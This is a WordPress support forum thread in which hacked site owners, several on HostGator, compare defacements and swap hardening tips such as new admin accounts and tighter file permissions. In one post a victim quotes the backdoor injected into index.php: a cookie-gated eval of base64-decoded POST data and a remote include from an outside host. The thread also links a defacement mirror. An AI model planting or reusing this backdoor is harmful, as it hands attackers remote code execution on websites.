I’ve fixed many hacks like this in the past few months alone. Do your site 3 favors:
1. Create a new administrator user (so that it doesn’t have ID 1 in the database) then delete any other administrator accounts that you don’t need. And since you’ve already set your password using MD5 go reset it to something new (using the reset password feature of WordPress) so that it will use the encryption ‘salt’ built into more recent WP versions, otherwise your MD5 passwords are subject to dictionary attacks and rainbow table attacks…
2. Remove write permissions from all of your theme files. You will no longer be able to edit your theme files using the WP theme editor but that’s a small price to pay.
3. Sign up to get the soon-to-be-released beta of Maximum Security for WordPress. Ya, that’s a shameless plug… I hope it helps you though.
Finally, don’t believe for one second that you’ve really identified the bad guys responsible for messing with your sites. It’s extremely easy to cover one’s tracks on the Internet and make it look as though someone else is responsible for whatever activity. “False flag” operations are incredibly common. Most bad guys already know how to do that and do it as a matter of habit. To really track down a bad guy typically requires the cooperation of many ISPs across the world – although once in a while a bad guy turns out to be a complete idiot that is all too easy find. That’s rather rare.
Thread Starter
freeon
(@freeon)
Wpsec thanks for the additional info…well received. Additionally I found the forum that the hackers hang out, trade their hacking software and boast about their so called defacements. http://arabic-m.com/index.php?page=mirror&id=18268 might be a good idea for security to reverse engineer their hacking software to prevent future attacks. Little children must play cat and mouse.
Freeon, my wordpress sites and one non wordpress site were also hacked into by the same assassin hackers on friday night/saturday morning (multiple sites, but one hosting account). Seems like a defacement only. Have you done anything furthur to secure your setup? Also, I am using hostgator, and I don’t know if it has anything to do with them or not. I changed the index.html pages. Rather annoying..
Thread Starter
freeon
(@freeon)
I’m using hostgator too. I have done what wpsec has suggested. So far so good. They hacked multiple wp sites of mine. Easy enough to fix…just a waste of time. In the real world I have to deal with idiots tagging my garage with graffiti. In cyberspace its children hacking. Pull yourself up by your bootstraps and keep on walking…lol. I make money on the internet…hackers waste their lives on the internet! At the end of the day I win.
Hi,
We also are on HostGator (2 different accounts) and were hacked on 2 of our 2.7 installations. The attack is noticed when you can’t log in to your blog and are send into a loop (no error message either).
Once we check the DB users table we have a new user called WordPress and then I assume there is some new content added to the blog although we were not able to find it. Look for some comment spam and maybe new content.
The second attack from last night was more severe and it seems like the entire blog was reloaded with 2007 version files. I mean EVERY single file on the server is dated 2007. That way we can’t tell which files were changed and we must assume everything is compromised.
The attack includes the addition of these lines into index.php and xmlrpc.php was also changed. This is index.php:
<?php if(md5($_COOKIE['c9a8b336f8ead0e0'])=="5dfa4a678793aeaee3d9394d72d12147"){ eval(base64_decode($_POST['file'])); exit; } ?><?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);
/** Loads the WordPress Environment and Template */
if (isset($_GET['license'])) {
@include('http://wordpress.net.in/license.txt');
} else {
require('./wp-blog-header.php');
}
?>
We are now reinstalling and using a backup copy of the content. We will be tightening the file permissions and will watch closely.
I am worried that there is 2.7 vulnerability that is easily exploitable, if anyone has any ideas please let me know…
THANKS π
UPDATE:
Further research showed that there is a plugin that contains malicious code disguised as an image. The plugin is Get Recent Comments..
todo.cache was found in a plugin directory named “Get Recent Comments”.
The “picture” file was found in the Uploads folder, where normal pictures reside…
We are tightening security on the blogs and will update when complete
sunny51: Every single file on your server has changed and now you think you can prove, that “Get Recent Comments” contains malicious code? Maybe it does on your server, but of course it does not in it’s original state, when you downloaded it from http://wordpress.org/extend/plugins/get-recent-comments/.
I think you folks with Hostgator have a serious problem. This is the 3rd thread I’ve seen with hacked blogs and them as host- I would be asking them what the…?
you noticed that too, sam … π
yea – folks need to realize on shared servers that 90% of hacks come from someone having crappy security on their site or the host them self has crappy security.
Then there’s the 10% who think upgrades are a pain and put them off.
:>)
Does anyone have a more secure host they would recommend that is cost effective?
I’m hosted on Heart Internet and got hacked just over a week ago (2.7). They used the forgot password functionality somehow to change the password and then used the theme editor to upload their files. Think it was just a defacement but since I was away last week I have yet to go through everything and restore it to normality.
The odd thing was, I checked my stats and they found my blog by searching MSN search for the IP of the heart server and the word “wordpress”.
Would appreciate some thoughts on this!
I am hosted on hostgator and I have not been hacked.
I use many of the hints at Hardening WordPress maybe that’s why.
I have 4 blogs at hostgator on 4 different domains and none of them has been hacked.
I also have a complete FTP backup of my installation and have automated database backups emailed to me.
Hope that this helps.
jean
ps
watch me get hacked tomorrow now that i have posted this (fingers crossed)
SB
(@sairah)
I’m having the same problem (it’s just a defacement though, although so annoying, particularly since I’m not savvy to the level that I know how to fix it!). I run on Host Department…their service has not been the best, to be honest, but they give a lot of space and so I’ve stuck with them…
But honestly, I get this fugly thing as my homepage:
http://www.sairah.endless-time.net
If anyone has ANY idea how to deal with this, please let me know, I’m at a loss ='(
